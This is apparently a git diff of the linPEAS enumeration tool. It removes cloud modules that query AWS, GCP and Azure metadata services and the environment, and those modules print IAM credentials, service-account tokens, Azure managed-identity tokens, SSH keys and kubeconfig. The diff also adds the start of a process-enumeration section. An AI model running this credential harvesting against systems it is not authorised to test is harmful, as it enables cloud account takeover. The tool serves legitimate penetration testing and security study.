-printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC
-echo ""
-
-print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "Azure VM or Az metadata? ............. $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "Azure APP or IDENTITY_ENDPOINT? ...... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "Azure Automation Account? ............ $is_az_automation_acc\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/2_AWS_EC2.sh
@ -1,85 +0,0 @@
-# Title: Cloud - AWS EC2
-# ID: CL_AWS_EC2
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: AWS EC2 Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_ec2, exec_with_jq, print_2title, print_3title
-# Global Variables: $is_aws_ec2
-# Initial Functions: check_aws_ec2
-# Generated Global Variables: $aws_req, $HEADER, $URL, $mac, $role, $TOKEN, $TOKEN_HEADER, $TOKEN_TTL
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_aws_ec2" = "Yes" ]; then
-    print_2title "AWS EC2 Enumeration"
-    
-    TOKEN=""
-    TOKEN_HEADER="X-aws-ec2-metadata-token"
-    TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600"
-    URL="http://169.254.169.254/latest/meta-data"
-    
-    aws_req=""
-    if [ "$(command -v curl || echo -n '')" ]; then
-        # Get token for IMDSv2
-        TOKEN=$(curl -s -f -X PUT "http://169.254.169.254/latest/api/token" -H "$TOKEN_TTL" 2>/dev/null)
-        aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'"
-    elif [ "$(command -v wget || echo -n '')" ]; then
-        # Get token for IMDSv2
-        TOKEN=$(wget -q -O - --method=PUT --header="$TOKEN_TTL" "http://169.254.169.254/latest/api/token" 2>/dev/null)
-        aws_req="wget -q -O - --header '$TOKEN_HEADER: $TOKEN'"
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-  
-    if [ "$aws_req" ]; then
-        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
-        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
-        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
-        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
-        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
-        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
-
-        echo ""
-        print_3title "Account Info"
-        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
-
-        echo ""
-        print_3title "Network Info"
-        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
-          echo "Mac: $mac"
-          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
-          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
-          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
-          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
-          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
-          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
-          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
-          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
-          echo ""
-        done
-
-        echo ""
-        print_3title "IAM Role"
-        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
-        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
-          echo "Role: $role"
-          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
-          echo ""
-        done
-        
-        echo ""
-        print_3title "User Data"
-        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
-        
-        echo ""
-        print_3title "EC2 Security Credentials"
-        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
-        
-        print_3title "SSM Runnig"
-        ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED},"
-    fi
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
@ -1,48 +0,0 @@
-# Title: Cloud - AWS ECS
-# ID: CL_AWS_ECS
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: AWS ECS Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_ecs, exec_with_jq, print_2title, print_3title
-# Global Variables: $aws_ecs_metadata_uri, $aws_ecs_service_account_uri, $is_aws_ecs
-# Initial Functions: check_aws_ecs
-# Generated Global Variables: $aws_ecs_req
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_aws_ecs" = "Yes" ]; then
-    print_2title "AWS ECS Enumeration"
-    
-    aws_ecs_req=""
-    if [ "$(command -v curl || echo -n '')" ]; then
-        aws_ecs_req='curl -s -f'
-    elif [ "$(command -v wget || echo -n '')" ]; then
-        aws_ecs_req='wget -q -O -'
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-    if [ "$aws_ecs_metadata_uri" ]; then
-        print_3title "Container Info"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
-        echo ""
-        
-        print_3title "Task Info"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
-        echo ""
-    else
-        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
-    fi
-
-    if [ "$aws_ecs_service_account_uri" ]; then
-        print_3title "IAM Role"
-        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
-        echo ""
-    else
-        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
-    fi
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
@ -1,27 +0,0 @@
-# Title: Cloud - AWS Lambda
-# ID: CL_AWS_Lambda
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: AWS Lambda Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_lambda, print_2title
-# Global Variables: $is_aws_lambda
-# Initial Functions: check_aws_lambda
-# Generated Global Variables: 
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$is_aws_lambda" = "Yes" ]; then
-  print_2title "AWS Lambda Enumeration"
-  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
-  printf "Region: "; env | grep AWS_REGION
-  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
-  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
-  printf "Session token: "; env | grep AWS_SESSION_TOKEN
-  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
-  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
-  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
@ -1,40 +0,0 @@
-# Title: Cloud - AWS Codebuild
-# ID: CL_AWS_Codebuild
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: AWS Codebuild Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_codebuild, exec_with_jq, print_2title, print_3title
-# Global Variables: $is_aws_codebuild
-# Initial Functions: check_aws_codebuild
-# Generated Global Variables: $aws_req, $METADATA_URL, $CREDS_PATH, $URL_CREDS
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$is_aws_codebuild" = "Yes" ]; then
-  print_2title "AWS Codebuild Enumeration"
-
-  aws_req=""
-  if [ "$(command -v curl || echo -n '')" ]; then
-      aws_req="curl -s -f"
-  elif [ "$(command -v wget || echo -n '')" ]; then
-      aws_req="wget -q -O -"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-      echo "The addresses are in /codebuild/output/tmp/env.sh"
-  fi
-
-  if [ "$aws_req" ]; then
-    print_3title "Credentials"
-    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
-    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
-    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
-
-    print_3title "Container Info"
-    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
-    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
@ -1,57 +0,0 @@
-# Title: Cloud - Google Cloud Function
-# ID: CL_Google_cloud_function
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Google Cloud Function Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_gcp, print_2title, print_3title, print_info
-# Global Variables: $is_gcp_function, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
-# Initial Functions: check_gcp
-# Generated Global Variables: $gcp_req, $p_id, $p_num, $inst_id, $inst_zone, $mtls_info
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_gcp_function" = "Yes" ]; then
-    gcp_req=""
-    if [ "$(command -v curl)" ]; then
-        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
-    elif [ "$(command -v wget)" ]; then
-        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-    # GCP Enumeration
-    if [ "$gcp_req" ]; then
-        print_2title "Google Cloud Platform Enumeration"
-        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
-
-        ## GC Project Info
-        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
-        [ "$p_id" ] && echo "Project-ID: $p_id"
-        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
-        [ "$p_num" ] && echo "Project Number: $p_num"
-
-        # Instance Info
-        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
-        [ "$inst_id" ] && echo "Instance ID: $inst_id"
-        mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)
-        [ "$mtls_info" ] && echo "MTLS info: $mtls_info"
-        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
-        [ "$inst_zone" ] && echo "Zone: $inst_zone"
-
-        echo ""
-        print_3title "Service Accounts"
-        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
-            echo "  Name: $sa"
-            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email")
-            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases")
-            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity")
-            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
-            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token")
-            echo "  ==============  "
-        done
-    fi
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/7_Google_cloud_vm.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/7_Google_cloud_vm.sh
@ -1,111 +0,0 @@
-# Title: Cloud - Google Cloud VM
-# ID: CL_Google_cloud_vm
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Google Cloud VM Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_gcp, print_2title, print_3title, print_info
-# Global Variables: $is_gcp_vm, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
-# Initial Functions: check_gcp
-# Generated Global Variables: $gcp_req, $p_id, $p_num, $pssh_k, $p_attrs, $osl_u, $osl_g, $osl_sk, $osl_au, $inst_d, $inst_hostn, $inst_id, $inst_img, $inst_mt, $inst_n, $inst_tag, $inst_zone, $inst_k8s_loc, $inst_k8s_name, $inst_k8s_osl_e, $inst_k8s_klab, $inst_k8s_kubec, $inst_k8s_kubenv, $iface
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_gcp_vm" = "Yes" ]; then
-    gcp_req=""
-    if [ "$(command -v curl || echo -n '')" ]; then
-        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
-    elif [ "$(command -v wget || echo -n '')" ]; then
-        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-
-    if [ "$gcp_req" ]; then
-        print_2title "Google Cloud Platform Enumeration"
-        print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
-
-        ## GC Project Info
-        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
-        [ "$p_id" ] && echo "Project-ID: $p_id"
-        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
-        [ "$p_num" ] && echo "Project Number: $p_num"
-        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
-        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
-        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
-        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
-
-        # OSLogin Info
-        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
-        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
-        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
-        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
-        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
-        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
-        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
-        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
-
-        # Instance Info
-        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
-        [ "$inst_d" ] && echo "Instance Description: "
-        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
-        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
-        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
-        [ "$inst_id" ] && echo "Instance ID: $inst_id"
-        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
-        [ "$inst_img" ] && echo "Instance Image: $inst_img"
-        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
-        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
-        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
-        [ "$inst_n" ] && echo "Instance Name: $inst_n"
-        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
-        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
-        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
-        [ "$inst_zone" ] && echo "Zone: $inst_zone"
-
-        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
-        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
-        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
-        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
-        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
-        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
-        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
-        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
-        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
-        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
-        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
-        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
-
-        echo ""
-        print_3title "Interfaces"
-        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
-            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
-            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
-            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
-            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
-            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
-            echo "  ==============  "
-        done
-        
-        echo ""
-        print_3title "User Data"
-        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
-        echo ""
-
-        echo ""
-        print_3title "Service Accounts"
-        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
-            echo "  Name: $sa"
-            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
-            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
-            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
-            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
-            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
-            echo "  ==============  "
-        done
-    fi
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_VM.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_VM.sh
@ -1,70 +0,0 @@
-# Title: Cloud - Azure VM
-# ID: CL_Azure_VM
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Azure VM Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_az_vm, exec_with_jq, print_2title, print_3title
-# Global Variables: $is_az_vm
-# Initial Functions: check_az_vm
-# Generated Global Variables: $API_VERSION, $HEADER, $az_req, $URL
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_az_vm" = "Yes" ]; then
-  print_2title "Azure VM Enumeration"
-
-  HEADER="Metadata:true"
-  URL="http://169.254.169.254/metadata"
-  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
-  
-  az_req=""
-  if [ "$(command -v curl || echo -n '')" ]; then
-      az_req="curl -s -f -L -H '$HEADER'"
-  elif [ "$(command -v wget || echo -n '')" ]; then
-      az_req="wget -q -O - --header '$HEADER'"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$az_req" ]; then
-    print_3title "Instance details"
-    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
-    echo ""
-
-    print_3title "Load Balancer details"
-    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
-    echo ""
-
-    print_3title "User Data"
-    exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null
-    echo ""
-
-    print_3title "Custom Data and other configs (root needed)"
-    (cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED},"
-    echo ""
-
-    print_3title "Management token"
-    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
-    echo ""
-
-    print_3title "Graph token"
-    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
-    echo ""
-    
-    print_3title "Vault token"
-    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
-    echo ""
-
-    print_3title "Storage token"
-    print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
-    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
-    echo ""
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/9_Azure_app_service.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/9_Azure_app_service.sh
@ -1,46 +0,0 @@
-# Title: Cloud - Azure App Service 
-# ID: CL_Azure_app_service
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Azure App Service Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_az_app, exec_with_jq, print_2title, print_3title
-# Global Variables: $is_az_app,
-# Initial Functions: check_az_app
-# Generated Global Variables: $API_VERSION, $HEADER, $az_req
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
-
-if [ "$is_az_app" = "Yes" ]; then
-  print_2title "Azure App Service Enumeration"
-
-  HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
-
-  az_req=""
-  if [ "$(command -v curl || echo -n '')" ]; then
-      az_req="curl -s -f -L -H '$HEADER'"
-  elif [ "$(command -v wget || echo -n '')" ]; then
-      az_req="wget -q -O - --header '$HEADER'"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$az_req" ]; then
-    print_3title "Management token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
-    echo
-    print_3title "Graph token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
-    echo
-    print_3title "Vault token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
-    echo
-    print_3title "Storage token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
@ -0,0 +1,380 @@
+
+####################################################
+#-----) Processes & Cron & Services & Timers (-----#
+####################################################
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Cleaned proccesses
+  print_2title "Cleaned processes"
+
+  if [ "$NOUSEPS" ]; then
+    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
+  fi
+  print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+
+  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
+    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
+  fi
+
+  if [ "$NOUSEPS" ]; then
+    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+    pslist=$(print_ps)
+  else
+    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
+      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+      if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
+        cpid=$(echo "$psline" | awk '{print $2}')
+        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
+        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
+          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
+        fi
+      fi
+    done
+    pslist=$(ps auxwww)
+    echo ""
+
+    #-- PCS) Binary processes permissions
+    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
